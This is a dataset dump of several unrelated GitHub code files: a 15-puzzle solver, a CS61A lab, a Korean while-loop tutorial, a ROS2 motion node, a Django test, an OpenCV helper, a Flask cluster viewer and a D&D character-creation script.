dir\ndef IsMoveToAvailable(a, dir) :\n locX = LocX(a)\n if (dir == \"L\") :\n if (locX == 1 or locX == 5 or locX == 9 or locX == 13) :\n return False\n else :\n return True\n elif (dir == \"R\") :\n if (locX == 4 or locX == 8 or locX == 12 or locX == 16) :\n return False\n else :\n return True\n elif (dir == \"U\") :\n if (locX > 0 and locX < 5) :\n return False\n else :\n return True\n elif (dir == \"D\") :\n if (locX > 12 and locX < 17) :\n return False\n else :\n return True\n\n#Fungsi dengan parameter matriks puzzle dan char dir serta menggembalikan matrik puzzle setelah ubin kosongnya di geser ke arah dir\ndef MoveTo(a, dir) :\n b = copy.deepcopy(a)\n RowX = (LocX(a)-1)//4\n ColX = (LocX(a)-1)-(RowX*4)\n if (dir == \"L\") :\n b[RowX][ColX], b[RowX][ColX-1] = b[RowX][ColX-1], b[RowX][ColX]\n elif (dir == \"R\") :\n b[RowX][ColX], b[RowX][ColX+1] = b[RowX][ColX+1], b[RowX][ColX]\n elif (dir == \"U\") :\n b[RowX][ColX], b[RowX-1][ColX] = b[RowX-1][ColX], b[RowX][ColX]\n elif (dir == \"D\") :\n b[RowX][ColX], b[RowX+1][ColX] = b[RowX+1][ColX], b[RowX][ColX]\n return b\n\n#Fungsi dengan parameter matriks dan mengembalikan jumlah ubin yang tidak kosong yang tidak terdapat pada susunan akhir\ndef nUbinNotFinal(a):\n temp = \"1\"\n count = 0\n for i in range (4) :\n for j in range (4) :\n if (temp != a[i][j] and a[i][j] != \"X\") :\n count += 1\n temp = str((i*4)+j+2)\n return count\n\n#Fungsi dengan parameter matriks puzzle dan int depth serta mengembalikan cost simpul a dengan kedalaman depth\ndef Cost(a, depth) :\n return nUbinNotFinal(a)+depth \n\n####################################################################################################\n#MAIN PROGRAM\npzl = [0 for i in range (16)]\nnamaFile = input(\"Masukkan nama file puzzle: \")\nprint()\nprint(\"Puzzle yang akan diselesaikan : \")\nfile = open(namaFile, \"r\")\nfor i in range (4) :\n strLine = file.readline().replace('\\n', '').replace('\\r', '')\n pzl[i*4], pzl[i*4+1], pzl[i*4+2], pzl[i*4+3] = strLine.split(\" \")\n print(pzl[i*4], pzl[i*4+1], pzl[i*4+2], pzl[i*4+3])\nprint()\ntimeStart = perf_counter_ns()\ncountNode = 0\nif (not ReachableGoal(pzl)) :\n print(\"Persoalan tidak dapat diselesaikan\")\nelse :\n puzzle = [[0 for i in range (4)] for j in range (4)]\n for i in range (4) :\n for j in range (4) :\n puzzle[i][j] = pzl[i*4+j]\n if (nUbinNotFinal(puzzle) == 0) :\n print(\"Puzzle ini sudah pada susunan akhir! :\")\n PrintPuzzle(puzzle)\n else :\n print(\"Urutan penyelesaian puzzle :\")\n queue = []\n tplCostPzl = (Cost(puzzle, 0), puzzle, \"Root\", 0)\n queue.append(tplCostPzl)\n goal = False\n while (not goal) :\n temp = min(queue)\n if (nUbinNotFinal(temp[1]) == 0) :\n PrintPuzzle(temp[1])\n queue.remove(temp)\n goal = True\n else :\n PrintPuzzle(temp[1])\n depth = temp[3]+1\n if (IsMoveToAvailable(temp[1], \"L\") and temp[2] != \"R\") :\n tempPzl = MoveTo(temp[1], \"L\")\n tplCostPzl = (Cost(tempPzl, depth), tempPzl, \"L\", depth)\n queue.append(tplCostPzl)\n countNode +=1\n if (IsMoveToAvailable(temp[1], \"R\") and temp[2] != \"L\") :\n tempPzl = MoveTo(temp[1], \"R\")\n tplCostPzl = (Cost(tempPzl, depth), tempPzl, \"R\", depth)\n queue.append(tplCostPzl)\n countNode +=1\n if (IsMoveToAvailable(temp[1], \"U\") and temp[2] != \"D\") :\n tempPzl = MoveTo(temp[1], \"U\")\n tplCostPzl = (Cost(tempPzl, depth), tempPzl, \"U\", depth)\n queue.append(tplCostPzl)\n countNode +=1\n if (IsMoveToAvailable(temp[1], \"D\") and temp[2] != \"U\") :\n tempPzl = MoveTo(temp[1], \"D\")\n tplCostPzl = (Cost(tempPzl, depth), tempPzl, \"D\", depth)\n queue.append(tplCostPzl)\n countNode +=1\n queue.remove(temp)\n print(\" -> \")\nprint() \ntimeEnd = perf_counter_ns()\nprint(\"Waktu eksekusi :\", (timeEnd-timeStart)/pow(10,6), \"milidetik\")\nprint()\nprint(\"Jumlah simpul yang dibangkitkan :\", countNode)","repo_name":"sfa119f/Tucil3StrAlgo-13518095","sub_path":"src/15-Puzzle-Solver.py","file_name":"15-Puzzle-Solver.py","file_ext":"py","file_size_in_byte":6133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"74493025744","text":"from tkinter.tix import Tree\n\n\ndef falling(n, k):\n \"\"\"Compute the falling factorial of n to depth k.\n\n >>> falling(6, 3) # 6 * 5 * 4\n 120\n >>> falling(4, 3) # 4 * 3 * 2\n 24\n >>> falling(4, 1) # 4\n 4\n >>> falling(4, 0)\n 1\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n ans = 1\n while (k) :\n ans *= n\n n -= 1\n k -= 1\n return sum\n\ndef sum_digits(y):\n \"\"\"Sum all the digits of y.\n\n >>> sum_digits(10) # 1 + 0 = 1\n 1\n >>> sum_digits(4224) # 4 + 2 + 2 + 4 = 12\n 12\n >>> sum_digits(1234567890)\n 45\n >>> a = sum_digits(123) # make sure that you are using return rather than print\n >>> a\n 6\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n sum = 0\n while (y > 0) :\n t = y % 10\n sum += t\n y //= 10\n return sum\n\ndef double_eights(n):\n \"\"\"Return true if n has two eights in a row.\n >>> double_eights(8)\n False\n >>> double_eights(88)\n True\n >>> double_eights(2882)\n True\n >>> double_eights(880088)\n True\n >>> double_eights(12345)\n False\n >>> double_eights(80808080)\n False\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n s = str(n)\n for i in range (1, len(s)) :\n a, b = s[i], s[i - 1];\n if (a == '8' and b == '8') :\n return True\n return False\n\n","repo_name":"tsrigo/CS61A_su","sub_path":"Lab/lab01/lab01.py","file_name":"lab01.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11396622023","text":"'''\n# 반복문 : while 조건\n조건이 참이면 수행 거짓이면 탈출 \n\ncontinue\nbreak\n\n겹치지만 않으면 블럭이 블럭을 포함할 수 있다\n'''\na = 1\n\nwhile a <= 5:\n print(a, end = ' ') # 1 2 3 4 5\n a = a + 1\n # break\n \nprint('while 종료')\n\nprint()\nprint('while 블럭안에 while')\ni = 1\nwhile i <= 3:\n j = 1\n while j <= 4:\n print('i:' + str(i) + ', j:' + str(j))\n j += 1\n i += 1\n\nprint('\\nwhile 종료2')\n\nprint()\nprint('1 ~ 100 사이의 정수 중 3의 배수의 합')\ni = 1; hap = 0\nwhile i <= 100:\n # print(i, end = ' ') # 1 ~ 100까지\n if i % 3 == 0:\n # print(i, end = ' ') # 3의 배수 ~ 100까지\n hap += i\n i += 1\n \nprint('합은 ', hap) # 합은 1683\n \nprint()\ncolors = ['r', 'g', 'b']\nprint(len(colors)) # 3\na = 0\nwhile a < len(colors):\n print(colors[a], end = ':') # r:g:b:\n a += 1\n \nprint()\nwhile colors:\n print(colors.pop()) # pop은 추출\n \nprint(len(colors))\n\nprint()\nprint('*찍기')\ni = 1\nwhile i <= 10:\n j = 1\n res = ''\n while j <= i:\n res = res + '*'\n j += 1\n print(res)\n i += 1\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"shinbumjun/Python","sub_path":"pypro1/pack1/test06_while.py","file_name":"test06_while.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1267133672","text":"from functools import partial\n\nimport rclpy\nfrom rclpy.node import Node\n\nimport std_msgs.msg\nimport sensor_msgs.msg\nimport geometry_msgs.msg\n\nd = None\ndef publish_twist(pub):\n if d is None:\n return\n\n twist = geometry_msgs.msg.Twist()\n\n print(d)\n\n if d == 'turn left':\n twist.linear.x = 0.1\n twist.angular.z = 0.15\n elif d == 'turn right':\n twist.linear.x = 0.1\n twist.angular.z = -0.15\n elif d == 'go straight':\n twist.linear.x = 0.15\n twist.angular.z = 0.0\n elif d == 'search':\n twist.linear.x = 0.0\n twist.angular.z = 0.25\n else:\n print(\"bad direction {}\".format(d), file=sys.stderr)\n\n pub.publish(twist)\n\ndef main(args=None):\n rclpy.init(args=args)\n\n node = Node('motion_node')\n\n def on_direction_received(msg):\n global d\n d = msg.data\n\n vel_pub = node.create_publisher(\n geometry_msgs.msg.Twist,\n '/cmd_vel',\n 10)\n\n image_sub = node.create_subscription(\n std_msgs.msg.String,\n '/direction',\n on_direction_received,\n 10)\n\n timer = node.create_timer(0.1, partial(publish_twist, vel_pub))\n \n rclpy.spin(node)\n\n node.destroy_node()\n rclpy.shutdown()\n\nif __name__ == '__main__':\n main()\n","repo_name":"miuele/line_follower_turtlebot_ros2","sub_path":"src/motion_node.py","file_name":"motion_node.py","file_ext":"py","file_size_in_byte":1307,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"42164833811","text":"#!/usr/bin/python3\n\"\"\"Deal with json.\"\"\"\nimport json\n\n\ndef save_to_json_file(myobj, filename):\n \"\"\"Save to a json file.\n\n @param myobj: the file to add to the file.\n @param filename: name of the file.\n \"\"\"\n new_str = json.dumps(myobj)\n with open(filename, 'w') as new_file:\n new_file.write(new_str)\n","repo_name":"Juli868/alx-higher_level_programming","sub_path":"0x0B-python-input_output/5-save_to_json_file.py","file_name":"5-save_to_json_file.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4544761475","text":"from unittest.mock import patch\n\nfrom django.test import Client\n\nfrom blossom.api.models import Source\nfrom blossom.api.slack.transcription_check.messages import (\n _construct_transcription_check_text,\n)\nfrom blossom.utils.test_helpers import (\n create_check,\n create_submission,\n create_transcription,\n create_user,\n setup_user_client,\n)\n\n\ndef test_construct_transcription_check_text(client: Client) -> None:\n \"\"\"Test that the fallback text is generated correctly.\"\"\"\n client, _headers, user = setup_user_client(client, id=100, username=\"Userson\")\n mod = create_user(id=200, username=\"Moddington\")\n submission = create_submission(\n claimed_by=user,\n completed_by=user,\n # Allow long line for URL\n # flake8: noqa: E501\n url=\"https://www.reddit.com/r/CuratedTumblr/comments/tirg5d/surviving_a_sitcom_death_mention/\",\n source=Source(name=\"reddit\"),\n )\n transcription = create_transcription(submission=submission, user=user)\n check = create_check(transcription, moderator=mod, trigger=\"Watched (100.0%)\")\n\n expected = \"Check for u/Userson (21 Γ) on r/CuratedTumblr | Watched (100.0%)\"\n\n with patch(\"blossom.authentication.models.BlossomUser.gamma_at_time\", return_value=21):\n actual = _construct_transcription_check_text(check)\n\n assert actual == expected\n","repo_name":"GrafeasGroup/blossom","sub_path":"blossom/api/tests/slack/transcription_check/test_messages.py","file_name":"test_messages.py","file_ext":"py","file_size_in_byte":1351,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"48"} +{"seq_id":"20021318772","text":"'''\nCreated on Jun 16, 2010\n\n@author: sushil\n'''\n\nimport cv\nfrom MergeImages import MergeImages\nfrom opencv.cv import cvZero, cvInvert\n\nclass AddSpace:\n \n def __init__(self):\n ''\n \n def addWhiteSpace(self,lineImg,positionList,width):\n mergedImage=lineImg\n splitImage=list()\n mergeImages=MergeImages()\n index=0\n positionList.append(positionList[-1]);\n for position in positionList:\n if(index==0):\n startpos=0\n else:\n startpos=positionList[index-1]\n \n #print position,\"-\",startpos,\" \",position-startpos\n \n tempImg=cv.CreateImage((position-startpos,lineImg.height), lineImg.depth, lineImg.nChannels)\n whiteSpace=cv.CreateImage((width,lineImg.height), lineImg.depth, lineImg.nChannels)\n cv.Set(whiteSpace,255)\n #create new image variable\n\n cv.SetImageROI(lineImg, (startpos,0,position-startpos,lineImg.height)) #startpos, startpos, width, height\n #print cv.GetImageROI(lineImg)\n #print \"ht=\",tempImg.height\n #print \"wd=\",tempImg.width\n \n #copy roi in that new image variable\n cv.Copy(lineImg, tempImg)\n \n splitImage.append(tempImg)\n splitImage.append(whiteSpace)\n cv.ResetImageROI(lineImg)\n index=index+1\n cv.ShowImage(\"SPLIT\", splitImage[0])\n merged=mergeImages.mergeHorizontally(splitImage);\n return merged","repo_name":"sushilman/Nepali_OCR","sub_path":"AddSpace.py","file_name":"AddSpace.py","file_ext":"py","file_size_in_byte":1555,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"48"} +{"seq_id":"34316258530","text":"#!/usr/bin/env python3\n\n# export FLASK_ENV=development\n# export FLASK_APP=main.py\n#\t flask run\n\nfrom flask import Flask, render_template\napp = Flask(__name__)\n\nimport os\nimport base64\nimport yaml\nfrom github import Github\n\n\n@app.route('/')\ndef home():\n\n\t# Github setup\n\ttoken = os.environ['GITHUB_TOKEN']\n\tg = Github(token)\n\n\trepo = g.get_repo(\"alphagov/gsp-teams\")\n\tcontents = repo.get_contents(\"clusters\")\n\n\tclusters = []\n\n\tfor file in contents:\n\t\tdecoded = base64.b64decode(file.content)\n\t\tyamled = yaml.safe_load(decoded)\n\t\tclusters.append(yamled)\n\n\treturn render_template('home.html', clusters=clusters)\n\n\n# This is if a separate details page is required\n\n# @app.route('/')\n# def show_cluster_info(clustername):\n#\n# \t# Github setup\n# \ttoken = os.environ['GITHUB_TOKEN']\n# \tg = Github(token)\n#\n# \trepo = g.get_repo(\"alphagov/gsp-teams\")\n# \tfile = repo.get_contents(\"clusters/\" + clustername + \".yaml\")\n# \tdecoded = base64.b64decode(file.content)\n# \tcluster = yaml.safe_load(decoded)\n#\n# \treturn render_template('detail.html', cluster=cluster)\n","repo_name":"Digitiain/inspect-gsp-clusters","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"72078785427","text":"from variables import *\nimport pickle\nimport copy\n\n\nconfig = {\n 'DICE ROLL': 'VIRTUAL',\n 'ROLLS ALWAYS': 'ASK',\n 'ATTACK ALWAYS': 'ASK',\n 'SKILL CHECK ALWAYS': 'ASK',\n}\n\n\ndef choose_equipment(equipment_options, number_elements=1):\n \"\"\"\n It loops through the list of possible equipments, given, for each possible\n choice of it, the possibility to the user to select the one desired.\n :param equipment_options: A list containing the possible choices for the\n user. Every choice that it has is a list inside of it, if there is a hard\n group inside of it, it must be in a tuple, if the tuple is only one element\n it must be created by the keyword tuple().\n :param number_elements: Number of the elements that will be chosen\n :return: List of equipments chosen by the user.\n \"\"\"\n copy_list = copy.deepcopy(equipment_options)\n already_chosen = []\n last_chosen = None\n equipments = []\n\n for _ in range(number_elements):\n error = False\n item_number = 0\n choice = None\n\n try:\n choice = copy_list[item_number]\n except IndexError:\n error = True\n\n while not error:\n if ['GO BACK', 'EXIT'] not in choice:\n choice.append(['GO BACK', 'EXIT'])\n chosen = None\n valid_choice = False\n group_number = 1\n groups = {}\n text = ''\n\n # Tuples represent a group of more than one object that must be\n # chose together, so it prints all of them with only one number\n if tuple_inside_list(choice):\n tuples = []\n no_tuples = []\n\n for group in choice:\n if isinstance(group, tuple):\n tuples.append(group)\n else:\n no_tuples += list_with_no_list_or_dict(group)\n\n no_tuples = [no_tuples]\n choice = tuples + no_tuples\n\n text += 'You have to chose between:\\n'\n for group in choice:\n if isinstance(group, tuple):\n pack_name = None\n groups[str(group_number)] = group\n\n group_item_names = []\n for item in group:\n group_item_names.append(item.name)\n\n for pack, items in packs.items():\n is_pack = True\n for item in items:\n if item.name not in group_item_names:\n is_pack = False\n\n if is_pack:\n pack_name = pack\n\n if pack_name is not None:\n text += (\n f'Or group {group_number} '\n f'({pack_name.title()}):\\n')\n else:\n text += f'Or group {group_number}:\\n'\n elements = {}\n for element in group:\n if element not in elements:\n elements[element] = 1\n else:\n elements[element] += 1\n\n for element, units in elements.items():\n text += f'- {element.name.title()} x{units}\\n'\n\n group_number += 1\n\n else:\n text += 'Or any of these:\\n'\n for item in group:\n if type(item) is not str:\n text += (f'({group_number}) '\n f'{item.name.title()}\\n')\n else:\n text += f'({group_number}) {item.title()}\\n'\n\n groups[str(group_number)] = item\n group_number += 1\n text += '\\n'\n # When there's no tuple, every element's a possible choice alone\n else:\n choice = list_with_no_list_or_dict(choice)\n text += 'Choose one of the following options:\\n'\n\n for item in choice:\n if type(item) is not str:\n if item.name != 'UNARMED ATTACK':\n text += f'({group_number})' \\\n f' {item.name.title()}\\n'\n else:\n text += f'({group_number}) {item.title()}\\n'\n\n groups[str(group_number)] = item\n group_number += 1\n\n # Asks and checks the value given by the user\n choice = list_with_no_list_or_dict(choice)\n while not valid_choice:\n if len(equipments) != 0:\n elements = {}\n for element in equipments:\n if element not in elements:\n elements[element] = 1\n else:\n elements[element] += 1\n\n print(f'You have chosen so far:')\n\n for item, units in elements.items():\n print(f'- {item.name.title()} x{units}')\n\n print('')\n\n print(text)\n chosen = input('Type the number of the chosen one: ')\n\n if chosen.isnumeric() and chosen in groups:\n valid_choice = True\n\n if groups[chosen] != 'EXIT' \\\n and groups[chosen] != 'GO BACK':\n item_number += 1\n chosen = groups[chosen]\n choice.remove(chosen)\n\n elif groups[chosen] == 'GO BACK':\n if len(equipments) > 0:\n item_number -= 1\n if isinstance(last_chosen, list):\n for item in last_chosen:\n equipments.remove(item)\n else:\n equipments.remove(last_chosen)\n\n already_chosen.pop()\n if len(already_chosen) > 0:\n last_chosen = already_chosen[-1]\n else:\n last_chosen = None\n\n else:\n return 'GO BACK'\n\n elif groups[chosen] == 'EXIT':\n return 'EXIT'\n\n else:\n print('\\nSorry, not a valid number. Please try again.')\n\n if not isinstance(chosen, str):\n already_chosen.append(chosen)\n last_chosen = chosen\n\n if isinstance(chosen, tuple):\n chosen = create_simple_list(chosen)\n else:\n chosen = [chosen]\n\n equipments += chosen\n\n clear_terminal()\n try:\n choice = copy_list[item_number]\n except IndexError:\n error = True\n\n return equipments\n\n\ndef buy_equipment(starting_wealth, fixed_price=True):\n equipments = []\n wealth = starting_wealth\n\n finished = False\n while not finished:\n dictionary = index['EQUIPMENT'].copy()\n visited = []\n end = False\n wealth = starting_wealth\n equipments = []\n\n while not end:\n clear_terminal()\n\n options = {}\n selection_number = 1\n for name, item in dictionary.items():\n if isinstance(item, dict):\n key = f'{name}'\n else:\n # If it isn't a dictionary, it's a object possible to choose\n key = f'{name:27s}' \\\n f'Cost (gp): {str(item.cost):18s}' \\\n f'Weight (lb.): {item.weight:2.2f}' \\\n\n options[key] = item\n selection_number += 1\n\n selected = select(\n options=options,\n prompt=f'You have {wealth} gp to spend in equipment\\n'\n f'You can choose in the options for equipment:',\n show_type='key',\n return_type='value',\n single_item=True\n )\n\n if isinstance(selected, dict):\n if dictionary not in visited:\n visited.append(dictionary)\n dictionary = selected\n\n elif selected == 'GO BACK':\n if len(visited) >= 1:\n dictionary = visited[-1]\n visited.remove(dictionary)\n else:\n return ['GO BACK', 'GO BACK']\n\n elif selected == 'EXIT':\n end = True\n\n else:\n # A item was selected\n if fixed_price:\n price = selected.cost\n else:\n price = get_a_number(\n 'The price suggested for this item in the Player\\'s'\n f'Handbook is of {selected.cost} gp.\\n'\n 'How much are you paying for it?'\n )\n\n if price is not None:\n if wealth - price >= 0:\n equipments.append(selected)\n wealth -= price\n wealth = round(wealth, 2)\n\n if wealth == 0:\n end = True\n\n else:\n # The user bought a item, but could not afford it.\n print('')\n print(\n \"Sorry. It appears you don't have the means \"\n 'necessaries to buy this item. Please try again or '\n 'type BACK or EXIT'\n )\n\n clear_terminal()\n options = ['CONFIRM', 'RESTART']\n choice = select(\n options=options,\n prompt='You finished shopping for equipments.\\n'\n 'Select what to do now.',\n single_item=True,\n go_back=False,\n )\n\n if choice != 'RESTART':\n finished = True\n\n if choice == 'EXIT':\n equipments = None\n wealth = None\n\n return [equipments, wealth]\n\n\ndef random_trinket():\n trinkets = [\n Trinket('Mummified goblin hand'),\n Trinket('Piece of crystal that faintly glows in the moonlight'),\n Trinket('Gold coin minted in an unknown land'),\n Trinket('Diary written in a language you don\\'t know'),\n Trinket('Brass ring that never tarnishes'),\n Trinket('Old chess piece made from glass'),\n Trinket(\n 'Pair of knucklebone dice, each with a skull symbol on the side '\n 'that would normally show six pips'\n ),\n Trinket(\n 'Small idol depicting a nightmarish creature that gives you '\n 'unsettling dreams when you sleep near it'\n ),\n Trinket('Rope necklace from which dangles four mummified elf fingers'),\n Trinket('Deed for a parcel of land in a realm unknown to you'),\n Trinket('1-ounce block made from an unknown material'),\n Trinket('Small cloth doll skewered with needles'),\n Trinket('A tooth form an unknown beast'),\n Trinket('Enormous scale, perhaps from a dragon'),\n Trinket('Bright green feather'),\n Trinket('Old divination card bearing your likeness'),\n Trinket('Glass orb filled with moving smoke'),\n Trinket('1-pound egg with a bright red shell'),\n Trinket('Pipe that blows bubbles'),\n Trinket(\n 'Glass jar containing a weird bit of flesh floating '\n 'in pickling fluid'\n ),\n Trinket(\n 'A tiny gnome-crafted music box that plays a song you dimly '\n 'remember from your childhood'\n ),\n Trinket('Small wooden statuette of a smug halfling'),\n Trinket('Brass orb etched with strange runes'),\n Trinket('Multicolored stone disk'),\n Trinket('Tiny silver icon of a raven'),\n Trinket(\n 'Bag containing forty-seven humanoid teeth, '\n 'one of which is rotten'\n ),\n Trinket('Shard of obsidian that always feels warm to the touch'),\n Trinket('Dragon\\'s bony talon hanging from a plain leather necklace'),\n Trinket('Pair of old socks'),\n Trinket(\n 'Blank book whose pages refuse to hold any substance of marking'\n ),\n Trinket('Silver badge in the shape of a five-pointed star'),\n Trinket('Knife that belonged to a relative'),\n Trinket('Glass vial filled with nail clippings'),\n Trinket(\n 'Rectangular metal device with two tiny metal cups on one end '\n 'that throws sparks when wet'\n ),\n Trinket('White, sequined glove sized for a human'),\n Trinket('Vest with one hundred tiny pockets'),\n Trinket('Small, weightless stone block'),\n Trinket('Tiny sketch portrait of a goblin'),\n Trinket('Empty glass vial that smells of perfume when opened'),\n Trinket(\n 'Gemstone that looks like a lump of coal when '\n 'examined by anyone but you'\n ),\n Trinket('Scrap of cloth from an old banner'),\n Trinket('Rank insignia from a lost legionnaire'),\n Trinket('Tiny silver bell without a clapper'),\n Trinket('Mechanical canary inside a gnomish lamp'),\n Trinket(\n 'Tiny chest carved to look like it has '\n 'numerous feet on the bottom'\n ),\n Trinket('Dead sprite inside a clear glass bottle'),\n Trinket(\n 'Metal can that has no opening but sounds as if it is filled with'\n 'liquid , sand, spiders, or broken glass (your choice)'),\n Trinket(\n 'A glass orb filled with water, in '\n 'which swims a clockwork goldfish'\n ),\n Trinket('Silver spoon with an M engraved on the handle'),\n Trinket('Whistle made from gold-colored wood'),\n Trinket('Dead scarab beetle the size of your hand'),\n Trinket('Two toy soldiers, one with a missing head'),\n Trinket('Small box filled with different-sized buttons'),\n Trinket('Candle that can\\'t be lit'),\n Trinket('Tiny cage with no door'),\n Trinket('Old key'),\n Trinket('Indecipherable treasure map'),\n Trinket('Hilt from a broken sword'),\n Trinket('Rabbit\\'s foot'),\n Trinket('Glass eye'),\n Trinket('Cameo carved in the likeness of a hideous person'),\n Trinket('Silver skull the size of a coin'),\n Trinket('Alabaster mask'),\n Trinket('Pyramid of sticky black incense that smells very bad'),\n Trinket('Nightcap that, when worn, gives you pleasant dreams'),\n Trinket('Single caltrop made from bone'),\n Trinket('Gold monocle frame without the lens'),\n Trinket('A 1-inch cube, each side painted a different color'),\n Trinket('Crystal knob from a door'),\n Trinket('Small packet filled with pink dust'),\n Trinket(\n 'Fragment of a beautiful song, written as '\n 'musical notes on two pieces of parchment'\n ),\n Trinket('Silver teardrop earring made from a real teardrop'),\n Trinket(\n 'Shell of an egg painted with scenes of '\n 'human misery in disturbing detail'\n ),\n Trinket('Fan that, when unfolded, shows a sleeping cat'),\n Trinket('Set of bone pipes'),\n Trinket(\n 'Four-leaf clover pressed inside a book '\n 'discussing manners and etiquette'\n ),\n Trinket(\n 'Sheet of parchment upon which is drawn '\n 'a complex mechanical contraption'\n ),\n Trinket('Ornate scabbard that fits no blade you have found so far'),\n Trinket('Invitation to a party where a murder happened'),\n Trinket(\n 'Bronze pentacle with an etching of a rat\\'s head in its center'\n ),\n Trinket(\n 'Purple handkerchief embroidered with '\n 'the name of a powerful archmage'\n ),\n Trinket(\n 'Half of a floorplan for a temple, '\n 'castle, or some other structure'\n ),\n Trinket(\n 'Bit of folded cloth that, when unfolded, turns into a stylish cap'\n ),\n Trinket('Receipt of deposit at a bank in a far-flung city'),\n Trinket('Diary with seven missing pages'),\n Trinket(\n 'Empty silver snuffbox bearing an inscription '\n 'the surface that says \"dreams\"'\n ),\n Trinket('Iron holy symbol devoted to an unknown god'),\n Trinket(\n 'Book that tells the story of a legendary hero\\'s rise and fall, '\n 'with the last chapter missing'\n ),\n Trinket('Vial of dragon blood'),\n Trinket('Ancient arrow of elven design'),\n Trinket('Needle that never bends'),\n Trinket('Ornate brooch of dwarven design'),\n Trinket(\n 'Empty wine bottle bearing a pretty label that says \"The '\n 'Wizard of Wines Winery, Red Dragon Crush, 331422-W\"'\n ),\n Trinket('A mosaic tile with a multicolored, glazed surface'),\n Trinket('Petrified mouse'),\n Trinket(\n 'Black pirate flag adorned with a dragon\\'s skull and crossbones'\n ),\n Trinket(\n 'Tiny mechanical crab or spider that moves '\n 'about when it\\'s not being observed'),\n Trinket(\n 'Glass jar containing lard with a label '\n 'that reads \"Griffon Grease\"'\n ),\n Trinket(\n 'Wooden box with a ceramic bottom that holds a living '\n 'worm with a head on each end of its body'\n ),\n Trinket('Metal urn containing the ashes of a hero'),\n ]\n\n d100 = Dice(maximum=100)\n\n if config['DICE ROLL'] == 'VIRTUAL':\n number = d100.roll()\n else: # config['DICE ROLL'] == 'PHYSICAL'\n number = get_typed_dice(\n dice=d100,\n objective='define your random trinket.'\n )\n\n number -= 1\n\n print(f'You won a trinket: {trinkets[number].name}')\n print('Press ENTER to continue')\n input()\n\n return trinkets[number]\n\n\ndef get_variant(variant_name):\n \"\"\"\n The function gets if the user selected to use the variant instead of the\n default version of its background.\n :param variant_name: Name of the possible variant in the user's background\n :return: boolean, if the user chosen or not the variant\n \"\"\"\n variant = None\n\n if variant_name:\n prompt = f\"There's the variant {variant_name.title()} for your class!\"\n\n answer = select(\n options=['YES', 'NO'],\n prompt=prompt,\n single_item=True,\n go_back=False,\n finish=False,\n )\n if answer == 'YES':\n variant = True\n else:\n variant = False\n else:\n print('It appears that your class has no variant option.')\n\n clear_terminal()\n\n return variant\n\n\ndef deal_other_options(characteristic, characteristic_list):\n \"\"\"\n If the user selected to randomize its background characteristics or to\n write its own version of it.\n :param characteristic: chosen characteristic by the user\n :param characteristic_list: list of all possible pre-chosen characteristics\n :return: the proper characteristic, be a random version or the write in.\n \"\"\"\n if characteristic == 'RANDOM':\n characteristic = characteristic_list[\n randint(0, len(characteristic_list) - 1)\n ]\n elif characteristic == 'WRITE IN':\n characteristic = input('Write what you want: ')\n\n return characteristic\n\n\ndef select_level():\n answer = select(\n options=['WRITE LEVEL'],\n prompt='It is time to select your initial level.',\n single_item=True\n )\n\n if answer == 'WRITE LEVEL':\n level = None\n loop = True\n\n while loop:\n level = get_a_number(\n prompt='What is your initial level?',\n go_back_message=False\n )\n\n if level is None:\n print('\\nYour level must be a number.')\n print('Press ENTER to continue...')\n input()\n clear_terminal()\n else:\n if level < 1 or level > 20:\n print('\\nPlease insert a number between 1 and 20.')\n print('Press ENTER to continue...')\n input()\n else:\n loop = False\n\n clear_terminal()\n else:\n level = answer\n\n return level\n\n\ndef create_class(classe, level, abilities):\n \"\"\"\n This function gets all the necessary info to create an object of the class\n Class and create it for the user.\n :param classe: string with the name of the chosen class\n :param level: int of the level number selected\n :param abilities: Abilities object with the abilities of the user\n :return: object of the class Class\n \"\"\"\n\n if classe == 'BARBARIAN':\n equipment_options = [\n [\n index['EQUIPMENT']['WEAPON']['MARTIAL']['MELEE']\n ],\n [\n (\n handaxe,\n handaxe\n ),\n [\n index['EQUIPMENT']['WEAPON']['SIMPLE']\n ]\n ],\n ]\n chosen_equipment = [\n packs['EXPLORER'],\n javelin,\n javelin,\n javelin,\n javelin\n ]\n wealth_dice = Dice(number=2, maximum=4)\n if config['DICE ROLL'] == 'VIRTUAL':\n starting_wealth = 10 * wealth_dice.roll()\n else: # config['DICE ROLL'] == 'PHYSICAL'\n starting_wealth = 10 * get_typed_dice(\n dice=wealth_dice,\n objective='define your starting wealth.'\n )\n\n classe = Barbarian(\n level=level,\n equipment_options=equipment_options,\n equipment=chosen_equipment,\n starting_wealth=starting_wealth\n )\n\n elif classe == 'BARD':\n equipment_options = [\n [\n rapier,\n longsword,\n index['EQUIPMENT']['WEAPON']['SIMPLE']\n ],\n [\n tuple(packs['DIPLOMAT']),\n tuple(packs['ENTERTAINER'])\n ],\n [\n index['EQUIPMENT']['TOOLS']['MUSICAL INSTRUMENT']\n ],\n ]\n wealth_dice = Dice(number=5, maximum=4)\n if config['DICE ROLL'] == 'VIRTUAL':\n starting_wealth = 10 * wealth_dice.roll()\n else: # config['DICE ROLL'] == 'PHYSICAL'\n starting_wealth = 10 * get_typed_dice(\n dice=wealth_dice,\n objective='define your starting wealth.'\n )\n\n classe = Bard(\n abilities=abilities,\n level=level,\n equipment_options=equipment_options,\n equipment=[leather_armor, dagger],\n starting_wealth=starting_wealth\n )\n\n elif classe == 'CLERIC':\n equipment_options = [\n [\n mace,\n warhammer\n ],\n [\n scale_mail_armor,\n leather_armor,\n chain_mail_armor\n ],\n [\n 